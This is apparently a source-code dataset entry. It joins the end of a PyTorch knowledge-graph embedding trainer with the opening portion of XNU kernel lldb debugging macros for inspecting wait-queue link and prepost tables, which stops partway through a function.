hr_t = data[3].to(self.config.device)
tr_h = data[4].to(self.config.device)
loss = self.train_step_projection(h, r, t, hr_t, tr_h)
elif self.model.training_strategy == TrainingStrategy.POINTWISE_BASED:
h = torch.LongTensor(data[0]).to(self.config.device)
r = torch.LongTensor(data[1]).to(self.config.device)
t = torch.LongTensor(data[2]).to(self.config.device)
y = torch.LongTensor(data[3]).to(self.config.device)
loss = self.train_step_pointwise(h, r, t, y)
elif self.model.training_strategy == TrainingStrategy.PAIRWISE_BASED:
pos_h = torch.LongTensor(data[0]).to(self.config.device)
pos_r = torch.LongTensor(data[1]).to(self.config.device)
pos_t = torch.LongTensor(data[2]).to(self.config.device)
neg_h = torch.LongTensor(data[3]).to(self.config.device)
neg_r = torch.LongTensor(data[4]).to(self.config.device)
neg_t = torch.LongTensor(data[5]).to(self.config.device)
loss = self.train_step_pairwise(pos_h, pos_r, pos_t, neg_h, neg_r, neg_t)
else:
raise NotImplementedError("Unknown training strategy: %s" % self.model.training_strategy)
loss.backward()
self.optimizer.step()
acc_loss += loss.item()
if not tuning:
progress_bar.set_description('acc_loss: %f, cur_loss: %f'% (acc_loss, loss))
self.training_results.append([epoch_idx, acc_loss])
return acc_loss
def enter_interactive_mode(self):
self.build_model()
self.load_model()
self._logger.info("""The training/loading of the model has finished!
Now enter interactive mode :)
-----
Example 1: trainer.infer_tails(1,10,topk=5)""")
self.infer_tails(1, 10, topk=5)
self._logger.info("""-----
Example 2: trainer.infer_heads(10,20,topk=5)""")
self.infer_heads(10, 20, topk=5)
self._logger.info("""-----
Example 3: trainer.infer_rels(1,20,topk=5)""")
self.infer_rels(1, 20, topk=5)
def exit_interactive_mode(self):
self._logger.info("Thank you for trying out inference interactive script :)")
def infer_tails(self, h, r, topk=5):
tails = self.evaluator.test_tail_rank(h, r, topk).cpu().numpy()
idx2ent = self.config.knowledge_graph.read_cache_data('idx2entity')
idx2rel = self.config.knowledge_graph.read_cache_data('idx2relation')
logs = [
"",
"(head, relation)->({},{}) :: Inferred tails->({})".format(h, r, ",".join([str(i) for i in tails])),
"",
"head: %s" % idx2ent[h],
"relation: %s" % idx2rel[r],
]
for idx, tail in enumerate(tails):
logs.append("%dth predicted tail: %s" % (idx, idx2ent[tail]))
self._logger.info("\n".join(logs))
return {tail: idx2ent[tail] for tail in tails}
def infer_heads(self, r, t, topk=5):
heads = self.evaluator.test_head_rank(r, t, topk).cpu().numpy()
idx2ent = self.config.knowledge_graph.read_cache_data('idx2entity')
idx2rel = self.config.knowledge_graph.read_cache_data('idx2relation')
logs = [
"",
"(relation,tail)->({},{}) :: Inferred heads->({})".format(t, r, ",".join([str(i) for i in heads])),
"",
"tail: %s" % idx2ent[t],
"relation: %s" % idx2rel[r],
]
for idx, head in enumerate(heads):
logs.append("%dth predicted head: %s" % (idx, idx2ent[head]))
self._logger.info("\n".join(logs))
return {head: idx2ent[head] for head in heads}
def infer_rels(self, h, t, topk=5):
if self.model.model_name.lower() in ["proje_pointwise", "conve", "tucker"]:
self._logger.info("%s model doesn't support relation inference in nature.")
return {}
rels = self.evaluator.test_rel_rank(h, t, topk).cpu().numpy()
idx2ent = self.config.knowledge_graph.read_cache_data('idx2entity')
idx2rel = self.config.knowledge_graph.read_cache_data('idx2relation')
logs = [
"",
"(head,tail)->({},{}) :: Inferred rels->({})".format(h, t, ",".join([str(i) for i in rels])),
"",
"head: %s" % idx2ent[h],
"tail: %s" % idx2ent[t],
]
for idx, rel in enumerate(rels):
logs.append("%dth predicted rel: %s" % (idx, idx2rel[rel]))
self._logger.info("\n".join(logs))
return {rel: idx2rel[rel] for rel in rels}
# ''' Procedural functions:'''
def save_model(self):
"""Function to save the model."""
saved_path = self.config.path_tmp / self.model.model_name
saved_path.mkdir(parents=True, exist_ok=True)
torch.save(self.model.state_dict(), str(saved_path / self.TRAINED_MODEL_FILE_NAME))
"""Save hyper-parameters into a yaml file with the model"""
save_path_config = saved_path / self.TRAINED_MODEL_CONFIG_NAME
np.save(save_path_config, self.config)
def load_model(self, model_path=None):
"""Function to load the model."""
if model_path is None:
model_path = self.config.path_tmp / self.model.model_name / self.TRAINED_MODEL_FILE_NAME
model_path_file = self.config.path_tmp / self.model.model_name / self.TRAINED_MODEL_FILE_NAME
model_path_config = self.config.path_tmp / self.model.model_name / self.TRAINED_MODEL_CONFIG_NAME
else:
model_path = Path(model_path)
model_path_file = model_path / self.TRAINED_MODEL_FILE_NAME
model_path_config = model_path / self.TRAINED_MODEL_CONFIG_NAME
if model_path_file.exists() and model_path_config.exists():
config_temp = np.load(model_path_config, allow_pickle=True).item()
# for key, value in config_temp.__dict__.items():
# print(key, " ", value)
self.config.__dict__['lmbda'] = config_temp.__dict__['lmbda']
self.config.__dict__['l1_flag'] = config_temp.__dict__['l1_flag']
self.config.__dict__['learning_rate'] = config_temp.__dict__['learning_rate']
self.config.__dict__['hidden_size'] = config_temp.__dict__['hidden_size']
self.config.__dict__['batch_size'] = config_temp.__dict__['batch_size']
self.config.__dict__['epochs'] = config_temp.__dict__['epochs']
self.config.__dict__['margin'] = config_temp.__dict__['margin']
self.config.__dict__['optimizer'] = config_temp.__dict__['optimizer']
self.config.__dict__['sampling'] = config_temp.__dict__['sampling']
self.config.__dict__['neg_rate'] = config_temp.__dict__['neg_rate']
self.model.__init__(**self.config.__dict__)
self.model.load_state_dict(torch.load(str(model_path_file)))
self.model.eval()
else:
raise ValueError("Cannot load model from %s" % model_path_file)
def display(self):
"""Function to display embedding."""
options = {"ent_only_plot": True,
"rel_only_plot": not self.config.plot_entity_only,
"ent_and_rel_plot": not self.config.plot_entity_only}
if self.config.plot_embedding:
viz = Visualization(self.model, self.config, vis_opts=options)
viz.plot_embedding(resultpath=self.config.path_figures, algos=self.model.model_name, show_label=False)
if self.config.plot_training_result:
viz = Visualization(self.model, self.config)
viz.plot_train_result()
if self.config.plot_testing_result:
viz = Visualization(self.model, self.config)
viz.plot_test_result()
def export_embeddings(self):
"""
Export embeddings in tsv and pandas pickled format.
With tsvs (both label, vector files), you can:
1) Use those pretained embeddings for your applications.
2) Visualize the embeddings in this website to gain insights. (https://projector.tensorflow.org/)
Pandas dataframes can be read with pd.read_pickle('desired_file.pickle')
"""
save_path = self.config.path_embeddings / self.model.model_name
save_path.mkdir(parents=True, exist_ok=True)
idx2ent = self.config.knowledge_graph.read_cache_data('idx2entity')
idx2rel = self.config.knowledge_graph.read_cache_data('idx2relation')
with open(str(save_path / "ent_labels.tsv"), 'w') as l_export_file:
for label in idx2ent.values():
l_export_file.write(label + "\n")
with open(str(save_path / "rel_labels.tsv"), 'w') as l_export_file:
for label in idx2rel.values():
l_export_file.write(label + "\n")
for named_embedding in self.model.parameter_list:
all_ids = list(range(0, int(named_embedding.weight.shape[0])))
stored_name = named_embedding.name
if len(named_embedding.weight.shape) == 2:
all_embs = named_embedding.weight.detach().cpu().numpy()
with open(str(save_path / ("%s.tsv" % stored_name)), 'w') as v_export_file:
for idx in all_ids:
v_export_file.write("\t".join([str(x) for x in all_embs[idx]]) + "\n")
def save_training_result(self):
"""Function that saves training result"""
files = os.listdir(str(self.config.path_result))
l = len([f for f in files if self.model.model_name in f if 'Training' in f])
df = pd.DataFrame(self.training_results, columns=['Epochs', 'Loss'])
with open(str(self.config.path_result / (self.model.model_name + '_Training_results_' + str(l) + '.csv')),
'w') as fh:
df.to_csv(fh)
| 41.250988 | 114 | 0.601111 |
8bfa6391903d99cee429b5a4f44fcabb34f25192 | 42,670 | py | Python | objc4/openSources/xnu-4570.71.2/tools/lldbmacros/waitq.py | honeyeeb/objc4-723 | 020a0dd480818207211835aefe04f44007c09575 | [
"MIT"
] | null | null | null | objc4/openSources/xnu-4570.71.2/tools/lldbmacros/waitq.py | honeyeeb/objc4-723 | 020a0dd480818207211835aefe04f44007c09575 | [
"MIT"
] | null | null | null | objc4/openSources/xnu-4570.71.2/tools/lldbmacros/waitq.py | honeyeeb/objc4-723 | 020a0dd480818207211835aefe04f44007c09575 | [
"MIT"
] | null | null | null | from xnu import *
from utils import *
from core.configuration import *
import sys
def GetWaitqStateStr(waitq):
wq_types = {
0: 'INV',
1: '???',
2: ' Q',
3: 'SET'
}
return wq_types[int(waitq.waitq_type)]
def GetWaitqBitsStr(waitq):
out_str = ""
if (Cast(waitq.waitq_interlock, 'int') != 0):
if waitq.waitq_irq:
out_str += '!'
else:
out_str += '*'
if waitq.waitq_fifo:
out_str += 'F'
if waitq.waitq_prepost:
out_str += 'P'
if waitq.waitq_irq:
out_str += 'I'
return out_str
def WaitqTableElemType(e):
type = (e.wqte.lt_bits >> 29) & 0x3
wqe_type = {
0: 'FREE',
1: 'ELEM',
2: 'LINK',
3: 'RSVD'
}
return wqe_type[type]
def WaitqTableElemId(e):
return e.wqte.lt_id.id
def WaitqTableElemValid(e):
if unsigned(e) == 0:
return 0
return (e.wqte.lt_bits & 0x80000000) == 0x80000000
def WaitqTableElemRefcnt(e):
return (e.wqte.lt_bits & 0x1fffffff)
def WaitqTableIdxFromId(id):
if hasattr(kern.globals, 'g_lt_idx_max'):
idx = id & unsigned(kern.globals.g_lt_idx_max)
else:
# best guess
idx = id & 0x000000000003ffff
return int(idx)
def WaitqTableGenFromId(id):
if hasattr(kern.globals, 'g_lt_idx_max'):
msk = ~unsigned(kern.globals.g_lt_idx_max)
else:
# best guess
msk = ~0x000000000003ffff
shift = 0
while (msk & 0x1) == 0:
msk >>= 1
shift += 1
return (unsigned(id) >> shift) & msk
def GetWaitqLink(id):
if int(id) == 0:
return 0, "NULL link id"
idx = WaitqTableIdxFromId(id)
if idx >= kern.globals.g_wqlinktable.nelem:
return 0, "Invalid waitq link table id: {:d}".format(id)
slab_slot = idx / kern.globals.g_wqlinktable.slab_elem;
slab = kern.globals.g_wqlinktable.table[int(slab_slot)]
if slab == 0:
print "Invalid waitq link table id:", str(id), " (invalid slab)"
first_elem = Cast(slab, 'lt_elem *')
addr = int(slab) + ((idx - first_elem.lt_id.idx) * int(kern.globals.g_wqlinktable.elem_sz))
link = kern.GetValueFromAddress(addr, 'waitq_link *')
gen = WaitqTableGenFromId(id)
warn_str = ''
if gen > 0 and link.wqte.lt_id.generation != gen:
warn_str = "WARNING: found idx:{:d}/gen:{:d}, but requested idx:{:d}/gen:{:d}".format(link.wqte.lt_id.idx, link.wqte.lt_id.generation, idx, gen)
link = 0
return link, warn_str
def GetWaitqPrepost(id):
idx = WaitqTableIdxFromId(id)
if idx > int(kern.globals.g_prepost_table.nelem):
warn_str = "Invalid waitq prepost table id {:s}".format(str(id))
return 0, warn_str
slab_slot = idx / kern.globals.g_prepost_table.slab_elem;
slab = kern.globals.g_prepost_table.table[int(slab_slot)]
if slab == 0:
warn_str = "Invalid waitq prepost table id:", str(id), " (invalid slab)"
return 0, warn_str
first_elem = Cast(slab, 'lt_elem *')
addr = int(slab) + ((idx - first_elem.lt_id.idx) * int(kern.globals.g_prepost_table.elem_sz))
wqp = kern.GetValueFromAddress(addr, 'wq_prepost *')
gen = WaitqTableGenFromId(id)
warn_str = ''
if gen > 0 and wqp.wqte.lt_id.generation != gen:
warn_str = "WARNING: found idx:{:d}/gen:{:d}, but requested idx:{:d}/gen:{:d}".format(wqp.wqte.lt_id.idx, wqp.wqte.lt_id.generation, idx, gen)
wqp = 0
return wqp, warn_str
def GetWaitqSetidString(setid):
idx = WaitqTableIdxFromId(setid)
gen = WaitqTableGenFromId(setid)
# This must match the format used in WaitqSetsFromLink
str = "{:>7d}/{:<#14x}".format(unsigned(idx), unsigned(gen))
return str
def WaitqSetsFromLink(link, sets, depth):
if int(link) == 0:
sets.append("{: <22s}".format("<link:NULL>"))
return
if WaitqTableElemType(link) == "ELEM":
#sets.append("{: <#18x}".format(unsigned(link.wql_wqs.wql_set)))
#sets.append("{:>7d}/{:<#14x}".format(unsigned(id.idx),unsigned(id.generation)))
sets.append(GetWaitqSetidString(link.wqte.lt_id.id))
return
if depth >= 950:
sets.append("{: <22s}".format("!recursion limit!"))
return
left_link = GetWaitqLink(link.wql_link.left_setid)[0]
right_link = GetWaitqLink(link.wql_link.right_setid)[0]
WaitqSetsFromLink(left_link, sets, depth + 1)
WaitqSetsFromLink(right_link, sets, depth + 1)
return
def GetWaitqSets(waitq):
sets = []
if int(waitq) == 0:
return sets
if waitq.waitq_set_id == 0:
return sets
link = GetWaitqLink(waitq.waitq_set_id)[0]
WaitqSetsFromLink(link, sets, 0)
return sets
def GetFrameString(pc, compact=True):
str = GetSourceInformationForAddress(unsigned(pc))
if compact:
return re.sub(r'.*0x[0-9a-f]+\s+<(\w+)( \+ 0x[0-9a-f]+)*>.*', r'\1', str, re.UNICODE)
else:
return re.sub(r'.*(0x[0-9a-f]+)\s+<(\w+)( \+ 0x[0-9a-f]+)*>.*', r'\2(\1)', str, re.UNICODE)
@lldb_type_summary(['waitq_link', 'waitq_link *'])
@header("{:<18s} {:<18s} {:<19s} {:<10s} {:<1s} {:<4s} {:<10s} {:<20s}".format('addr','id','idx','gen','V','type','refcnt','info'))
def GetWaitqSetidLinkSummary(link, verbose=False):
has_stats = 0
if not link:
return ""
fmt_str = "{l: <#18x} {l.wqte.lt_id.id: <#18x} {l.wqte.lt_id.idx: <7d} (->{l.wqte.lt_next_idx: <7d}) {l.wqte.lt_id.generation: <#10x} {v: <1s} {t: <4s} {rcnt: <10d} "
if hasattr(link, 'sl_alloc_task'):
has_stats = 1
fmt_str += "owner:{l.sl_alloc_task: <#x}/th:{l.sl_alloc_th: <#x}\n"
fmt_str += ' '*87
try:
pid = GetProcPIDForTask(link.sl_alloc_task)
except:
pid = unsigned(link.sl_alloc_task.audit_token.val[5])
pidnm = ""
if pid < 0:
pidnm = "DEAD:{:s}".format(GetProcNameForTask(link.sl_alloc_task))
else:
pidnm += GetProcNameForPid(pid)
fmt_str += " ({:d}/{:s}), ".format(pid, pidnm)
type = WaitqTableElemType(link)
if type == "ELEM":
type = "WQS"
v = "F"
if WaitqTableElemValid(link):
v = "T"
refcnt = WaitqTableElemRefcnt(link)
out_str = fmt_str.format(l=link, v=v, t=type, rcnt=refcnt)
if type == "WQS":
out_str += "wqs:{0: <#18x}".format(unsigned(link.wql_wqs.wql_set))
elif type == "LINK":
lID = link.wql_link.left_setid
rID = link.wql_link.right_setid
left = GetWaitqLink(lID)[0]
right = GetWaitqLink(rID)[0]
ltype = "<invalid>"
if WaitqTableElemValid(left):
ltype = WaitqTableElemType(left)
if ltype == "ELEM":
ltype = "WQS"
rtype = "<invalid>"
if WaitqTableElemValid(right):
rtype = WaitqTableElemType(right)
if rtype == "ELEM":
rtype = "WQS"
out_str += "left:{:<#x}({:s}), right:{:<#x}({:s})".format(lID, ltype, rID, rtype)
if hasattr(link, 'sl_alloc_bt') and unsigned(link.sl_alloc_bt[0]) > 0:
fmt_str = "\n{:s}alloc_bt({:d}):[".format(' '*87, link.sl_alloc_ts)
f = 0
while f < kern.globals.g_nwaitq_btframes:
fstr = GetFrameString(link.sl_alloc_bt[f], not verbose)
f += 1
if f == kern.globals.g_nwaitq_btframes:
fmt_str += "{:<s}".format(fstr)
else:
fmt_str += "{:<s} <- ".format(fstr)
fmt_str += "]"
out_str += fmt_str
if hasattr(link, 'sl_mkvalid_bt') and unsigned(link.sl_mkvalid_bt[0]) > 0:
fmt_str = "\n{:s}mkvalid_bt({:d}):[".format(' '*87, link.sl_mkvalid_ts)
f = 0
while f < kern.globals.g_nwaitq_btframes:
fstr = GetFrameString(link.sl_mkvalid_bt[f], not verbose)
f += 1
if f == kern.globals.g_nwaitq_btframes:
fmt_str += "{:<s}".format(fstr)
else:
fmt_str += "{:<s} <- ".format(fstr)
fmt_str += "]"
out_str += fmt_str
if hasattr(link, 'sl_invalidate_bt') and unsigned(link.sl_invalidate_bt[0]) > 0:
fmt_str = "\n{:s}invalidate_bt({:d}):[".format(' '*87, link.sl_invalidate_ts)
f = 0
while f < kern.globals.g_nwaitq_btframes:
fstr = GetFrameString(link.sl_invalidate_bt[f], not verbose)
f += 1
if f == kern.globals.g_nwaitq_btframes:
fmt_str += "{:<s}".format(fstr)
else:
fmt_str += "{:<s} <- ".format(fstr)
fmt_str += "]"
out_str += fmt_str
return out_str
def PrintWaitqSetidLinkTree(link, verbose, sets, indent=87):
if not WaitqTableElemType(link) == "LINK":
return
lID = link.wql_link.left_setid
rID = link.wql_link.right_setid
left = GetWaitqLink(lID)[0]
right = GetWaitqLink(rID)[0]
ltype = "<invalid>"
if WaitqTableElemValid(left):
ltype = WaitqTableElemType(left)
if ltype == "ELEM":
ltype = "WQS"
lstr = "L:{:<#x}({:s})".format(lID, ltype)
rtype = "<invalid>"
if WaitqTableElemValid(right):
rtype = WaitqTableElemType(right)
if rtype == "ELEM":
rtype = "WQS"
rstr = "R:{:<#x}({:s})".format(rID, rtype)
if ltype == "WQS":
sets.append(addressof(left.wql_wqs.wql_set.wqset_q))
if rtype == "WQS":
sets.append(addressof(right.wql_wqs.wql_set.wqset_q))
print "{:s}`->{:s}, {:s}".format(' '*indent, lstr, rstr)
if ltype == "WQS":
PrintWaitqSetidLinkTree(right, verbose, sets, indent + len(lstr) + 6);
else:
print "{:s}`->{:s}, {:s}".format(' '*indent, lstr, rstr)
PrintWaitqSetidLinkTree(left, verbose, sets, indent + 4);
PrintWaitqSetidLinkTree(right, verbose, sets, indent + len(lstr) + 6)
return
# Macro: showsetidlink
@lldb_command('showsetidlink', "S:FT")
def ShowSetidLink(cmd_args=None, cmd_options={}):
""" Print waitq_link structure summary
Note: you can pass either a complete ID (generation + index), or
just the index to the -S argument.
usage: showsetidlink [-F] [-S ID] [0xaddr]
-S {ID} : show the setid link whose ID is {ID}
-F : follow the chain of setid structures
and print a summary of each one
-T : print the tree of setidlinks in table format
"""
link = 0
followchain = 0
showtree = 0
verbose = False
if config['verbosity'] > vHUMAN:
verbose = True
if "-T" in cmd_options:
showtree = 1
if "-S" in cmd_options:
id = unsigned(kern.GetValueFromAddress(cmd_options["-S"], 'uint64_t *'))
link, warn_str = GetWaitqLink(id)
if not link:
if warn_str != '':
raise LookupError(warn_str)
else:
raise ArgumentError("Invalid link ID {:d}({:<#x}".format(id, id))
if "-F" in cmd_options:
followchain = 1
if link == 0:
if not cmd_args:
raise ArgumentError("Please pass the address of a waitq_link object")
link = kern.GetValueFromAddress(cmd_args[0], 'waitq_link *')
if not link:
raise ArgumentError("Invalid waitq_link {:s}".format(cmd_args[0]))
print GetWaitqSetidLinkSummary.header
print GetWaitqSetidLinkSummary(link, verbose)
if followchain == 1:
next_id = link.wqte.lt_next_idx
max_elem = int(kern.globals.g_wqlinktable.nelem)
if hasattr(kern.globals, 'g_lt_idx_max'):
max_elem = unsigned(kern.globals.g_lt_idx_max)
while link != 0 and next_id < max_elem:
link, warn_str = GetWaitqLink(unsigned(next_id))
if link != 0:
print GetWaitqSetidLinkSummary(link, verbose)
next_id = link.wqte.lt_next_idx
if showtree == 1:
sets = []
print "\nLinkTree:{:<#x}({:s})".format(link.wqte.lt_id.id, WaitqTableElemType(link))
PrintWaitqSetidLinkTree(link, verbose, sets, 9)
if len(sets) > 0:
print "{:d} Sets:".format(len(sets))
for wq in sets:
pp_str = GetWaitqPreposts(wq)
npreposts = len(pp_str)
nps = ""
if npreposts > 0:
if npreposts > 1:
nps = "s: "
else:
nps = ": "
nps += ';'.join(pp_str)
else:
nps = "s"
print "\tWQS:{:<#x} ({:d} prepost{:s})".format(unsigned(wq),npreposts,nps)
# EndMacro: showsetidlink
@lldb_command('showwaitqlink', "S:FT")
def ShowWaitqLink(cmd_args=None, cmd_options={}):
""" Print waitq_link structure summary
"""
ShowSetidLink(cmd_args, cmd_options)
# Macro: showallsetidlinks
@lldb_command('showallsetidlinks', 'V:T:S:F:XQ')
def ShowAllSetidLinks(cmd_args=None, cmd_options={}):
""" Dump / summarize all waitq set linktable elements
usage: showallsetidlinks [options]
-V {0,1} : only show [1 == valid/live links, 0 == invalid links]
-T {type} : only display objects of type {type}
-S {desc} : only display objects of type {type} which fit {desc}
-T LINK -S {desc} can be:
iL : Invalid left-link pointer (only)
iR : Invalid right-link pointer (only)
iLR : Invalid left+right link pointers
iLRI : Invalid left+right link pointers AND dead allocating process
w/o "-T" -S {desc} can be:
iP : Invalid / Dead allocating process
-F n : summarize the backtraces at frame level 'n'
-X : cross-check waitq pointers in link table
-Q : be quiet, only summarize
"""
opt_summary = 0
opt_type_filt = ""
opt_valid_only = 0
opt_invalid_only = 0
opt_bt_idx = 0
opt_cross_check = 0
opt_validate_links = 0
opt_subtype_filter = 0
verbose = False
if config['verbosity'] > vHUMAN:
verbose = True
if "-Q" in cmd_options:
opt_summary = 1
if "-V" in cmd_options:
if int(cmd_options["-V"]) == 1:
opt_valid_only = 1
elif int(cmd_options["-V"]) == 0:
opt_invalid_only = 1
else:
raise ArgumentError("Invalid parameter to -V '{:s}': expecting 0 or 1".format(cmd_options["-V"]))
if "-X" in cmd_options:
opt_cross_check = 1
nunique_wqs = 0
nduplicated_wqs = 0
max_wqs_dupes = 0
if "-F" in cmd_options:
opt_bt_idx = unsigned(cmd_options["-F"])
if hasattr(kern.globals, "g_nwaitq_btframes"):
if opt_bt_idx >= unsigned(kern.globals.g_nwaitq_btframes):
raise ArgumentError("Invalid BT index '{:s}' max:{:d}".format(cmd_options["-F"], unsigned(kern.globals.g_nwaitq_btframes) - 1))
if "-T" in cmd_options:
opt_type_filt = cmd_options["-T"]
if opt_type_filt == "FREE" or opt_type_filt == "RSVD" or opt_type_filt == "LINK":
pass
elif opt_type_filt == "WQS":
opt_type_filt = "ELEM"
else:
raise ArgumentError("Invalid type filter'{:s}'".format(cmd_options["-T"]))
if "-S" in cmd_options:
opt_subtype_filter = cmd_options["-S"]
if opt_type_filt == "LINK":
if not (opt_subtype_filter == "iL" or \
opt_subtype_filter == "iR" or \
opt_subtype_filter == "iLR" or \
opt_subtype_filter == "iLRI"):
raise ArgumentError("Invalid LINK sub-type filter \{desc\}: {:s}".format(opt_subtype_filter))
elif opt_type_filt == "":
if not opt_subtype_filter == "iP":
raise ArgumentError("Invalid sub-type filter \{desc\}: {:s}".format(opt_subtype_filter))
table = kern.globals.g_wqlinktable
nelem = int(table.nelem)
wq_ptr = {}
bt_summary = {}
nfree = 0
ninv = 0
nwqs = 0
nlink = 0
nrsvd = 0
hdr_str = "Looking through {:d} waitq_link objects from g_wqlinktable@{:<#x}".format(nelem, addressof(kern.globals.g_wqlinktable))
if opt_type_filt != "" or opt_valid_only != 0:
hdr_str += "\n\t`-> for "
if opt_valid_only:
hdr_str += "valid "
else:
hdr_str += "all "
if opt_type_filt == "":
hdr_str += "objects"
else:
hdr_str += "{:s} objects".format(opt_type_filt)
else:
if opt_valid_only:
hdr_str += "\n\t`-> showing only VALID links"
elif opt_invalid_only:
hdr_str += "\n\t`-> showing only INVALID links"
if opt_subtype_filter != 0:
if opt_type_filt != "LINK" and opt_type_filt != "":
raise ArgumentError("Subtype (-S {desc}) can only be used with (-T LINK) or no type filter at all")
hdr_str += "\n\t`-> filtering {:s} objects through '{:s}'".format(opt_type_filt, opt_subtype_filter)
if opt_cross_check:
hdr_str += "\n\t`-> cross-checking WQS elements for duplicates"
hdr_str += "\n\n"
print hdr_str
if not opt_summary:
print GetWaitqSetidLinkSummary.header
id = 0
while id < nelem:
if id == 0:
# Set a generation count to differentiate from an invalid ID
first_entry = Cast(kern.globals.g_wqlinktable.table[0], 'lt_elem *')
link = GetWaitqLink(first_entry.lt_id.id)[0]
else:
link = GetWaitqLink(id)[0]
if not link:
print "<<<invalid link:{:d}>>>".format(id)
ninv += 1
else:
lt = WaitqTableElemType(link)
isvalid = WaitqTableElemValid(link)
inconsistent = 0
do_print = not ( (isvalid and opt_invalid_only) or (not isvalid and opt_valid_only) )
if do_print and opt_subtype_filter != 0 and lt == "LINK":
lID = link.wql_link.left_setid
rID = link.wql_link.right_setid
left = GetWaitqLink(lID)[0]
right = GetWaitqLink(rID)[0]
lValid = WaitqTableElemValid(left)
rValid = WaitqTableElemValid(right)
if opt_subtype_filter == "iL":
if lValid or (not lValid and not rValid):
do_print = False
elif opt_subtype_filter == "iR":
if rValid or (not rValid and not lValid):
do_print = False
elif opt_subtype_filter == "iLR":
if rValid or lValid:
do_print = False
elif opt_subtype_filter == "iLRI" and hasattr(link, 'sl_alloc_task'):
# only print this if both left and right are invalid
# and the allocating task is unknown/dead
do_print = False
is_dead = 0
pid = -1
try:
pid = GetProcPIDForTask(link.sl_alloc_task)
except:
if link.sl_alloc_task:
pid = unsigned(link.sl_alloc_task.audit_token.val[5])
if pid < 0:
is_dead = 1
else:
pidnm = GetProcNameForPid(pid)
if pidnm == "Unknown":
is_dead = 1
if (not rValid) and (not lValid) and is_dead:
do_print = True
if do_print and opt_type_filt == "" and opt_subtype_filter == "iP" and hasattr(link, 'sl_alloc_task'):
# Only print non-free table objects that were allocated by
# dead processes
do_print = False
is_dead = 0
pid = -1
try:
pid = GetProcPIDForTask(link.sl_alloc_task)
except:
if link.sl_alloc_task:
pid = unsigned(link.sl_alloc_task.audit_token.val[5])
if pid < 0:
is_dead = 1
else:
pidnm = GetProcNameForPid(pid)
if pidnm == "Unknown":
is_dead = 1
if is_dead:
do_print = True
if (opt_type_filt == "" or opt_type_filt == lt) and do_print:
if lt == "ELEM":
nwqs += 1
elif lt == "LINK":
nlink += 1
elif lt == "RSVD":
nrsvd += 1
elif lt == "FREE":
nfree += 1
else:
ninv += 1
inconsistent = 1
if hasattr(link, 'sl_alloc_bt'):
pc = unsigned(link.sl_alloc_bt[opt_bt_idx])
pc_str = str(pc)
if pc > 0:
if pc_str in bt_summary:
bt_summary[pc_str] += 1
else:
bt_summary[pc_str] = 1
if not opt_summary:
print GetWaitqSetidLinkSummary(link, verbose)
if inconsistent:
ninconsistent += 1
# print out warnings about inconsistent state as we parse
# the list - even if the caller wants a summary
print "[WARNING] inconsistent state in idx: {:d} ({:s} element)".format(link.wqte.lt_id.idx, lt)
if opt_cross_check == 1 and lt == "ELEM":
wq = unsigned(addressof(link.wql_wqs.wql_set.wqset_q))
if wq in wq_ptr:
wq_ptr[wq].append(id)
l = len(wq_ptr[wq])
if l == 2:
nduplicated_wqs += 1
if l > max_wqs_dupes:
max_wqs_dupes = l
else:
wq_ptr[wq] = [ id ]
nunique_wqs += 1
id += 1
if opt_summary or verbose:
if verbose and opt_cross_check:
sys.stderr.write('[{:d}|{:d}|{:d}] id: {:d}/{:d}... \r'.format(nunique_wqs, nduplicated_wqs, max_wqs_dupes, id, nelem))
else:
sys.stderr.write('id: {:d}/{:d}... \r'.format(id, nelem))
nused = nwqs + nlink + nrsvd
nfound = nused + nfree + ninv
print "\n\nFound {:d} objects: {:d} WQS, {:d} LINK, {:d} RSVD, {:d} FREE".format(nfound, nwqs, nlink, nrsvd, nfree)
if (opt_type_filt == "" and opt_valid_only == 0) and (nused != table.used_elem):
print"\tWARNING: inconsistent state! Table reports {:d}/{:d} used elem, found {:d}/{:d}".format(table.used_elem, nelem, nused, nfound)
if len(bt_summary) > 0:
print "Link allocation BT (frame={:d})".format(opt_bt_idx)
for k,v in bt_summary.iteritems():
print "\t[{:d}] from: {:s}".format(v, GetSourceInformationForAddress(unsigned(k)))
if opt_cross_check:
print "\n{:d} Duplicated WQS objects:".format(nduplicated_wqs)
for wq in wq_ptr:
l = len(wq_ptr[wq])
if l > 1:
print "\tWQS:{:#x} ({:d} {:s}".format(wq, l, str(wq_ptr[wq]))
# EndMacro: showallsetidlinks
# Macro: showallpreposts
@lldb_command('showallpreposts', 'VQT:F:Y:')
def ShowAllPreposts(cmd_args=None, cmd_options={}):
""" Dump / summarize all waitq prepost linkage elements
usage: showallpreposts [-V] [-T {type}] [-Y n] [-F n] [-Q]
-V : only show valid / live links
-T {type} : only display objects of type {type}
-Y {0|1} : only only show POST objects that are
valid (-Y 1) or invalid (-Y 0)
-F n : summarize the backtraces at frame level 'n'
-Q : be quiet, only summarize
"""
opt_summary = 0
opt_type_filt = ""
opt_valid_only = 0
opt_post_type = -1
opt_bt_idx = 0
verbose = False
if config['verbosity'] > vHUMAN:
verbose = True
if "-Q" in cmd_options:
opt_summary = 1
if "-V" in cmd_options:
opt_valid_only = 1
if "-Y" in cmd_options:
opt_post_type = unsigned(cmd_options["-Y"])
if opt_post_type != 0 and opt_post_type != 1:
raise ArgumentError("Invalid POST obj specifier [-Y %d] (expected 0 or 1)" % cmd_options["-Y"])
if "-F" in cmd_options:
opt_bt_idx = unsigned(cmd_options["-F"])
if hasattr(kern.globals, "g_nwaitq_btframes"):
if opt_bt_idx >= unsigned(kern.globals.g_nwaitq_btframes):
raise ArgumentError("Invalid BT index '{:s}' max:{:d}".format(cmd_options["-F"], unsigned(kern.globals.g_nwaitq_btframes) - 1))
if "-T" in cmd_options:
opt_type_filt = cmd_options["-T"]
if opt_type_filt == "FREE" or opt_type_filt == "RSVD":
pass
elif opt_type_filt == "POST":
opt_type_filt = "LINK"
elif opt_type_filt == "WQ":
opt_type_filt = "ELEM"
else:
raise ArgumentError("Invalid type filter'{:s}'".format(cmd_options["-T"]))
table = kern.globals.g_prepost_table
nelem = int(table.nelem)
bt_summary = {}
nfree = 0
ninv = 0
nwq = 0
npost = 0
nrsvd = 0
hdr_str = "Looking through {:d} objects from g_prepost_table@{:<#x}".format(nelem, addressof(kern.globals.g_prepost_table))
if opt_type_filt != "" or opt_valid_only != 0:
hdr_str += "\n\t`-> for "
if opt_valid_only:
hdr_str += "valid "
else:
hdr_str += "all "
if opt_type_filt == "":
hdr_str += "objects"
else:
hdr_str += "{:s} objects".format(cmd_options["-T"])
print hdr_str
if not opt_summary:
print GetWaitqPrepostSummary.header
id = 0
while id < nelem:
wqp = GetWaitqPrepost(id)[0]
if wqp == 0:
